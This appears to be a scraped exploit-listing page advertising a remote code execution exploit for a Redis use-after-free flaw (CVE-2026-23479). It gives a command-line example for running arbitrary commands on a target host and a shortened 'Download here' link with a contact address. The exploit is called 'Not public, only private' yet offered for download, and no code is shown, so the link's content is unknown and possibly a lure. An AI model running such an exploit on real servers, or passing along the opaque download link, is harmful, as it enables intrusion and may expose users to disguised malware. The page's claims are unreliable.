## https://sploitus.com/exploit?id=76D18275-7321-50D6-BBC8-6A581762726A
# redis-server from 7.2.0 until 8.6.3, the Remote Code Execution (CVE-2026-23479)
## Overview
A HIGH vulnerability, classified as CVE-2026-23479, has been identified, categorized under CWE-416, (CVSS 8.8). Redis is an in-memory data structure store. In redis-server from 7.2.0 until 8.6.3, the unblock client flow does not handle an error return from `processCommandAndResetClient` when re-executing a blocked command.
## Details
- **CVE ID**: [CVE-2026-23479](https://nvd.nist.gov/vuln/detail/CVE-2026-23479)
- **Discovered**: 2026-05-05
- **Published**: 2026-05-05
- **Impact**: Confidentiality, Integrity, Availability
- **Exploit Availability**: Not public, only private.
## Vulnerability Description
Redis is an in-memory data structure store. In redis-server from 7.2.0 until 8.6.3, the unblock client flow does not handle an error return from `processCommandAndResetClient` when re-executing a blocked command. If a blocked client is evicted during this flow, an authenticated attacker can trigger a use-after-free that may lead to remote code execution. This has been patched in version 8.6.3.
## Affected Versions
**Redis Redis:**
- before 8.6.3
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact **security@exploit.in**
## Exploit:
### [Download here](https://tinyurl.com/29ndcrn8)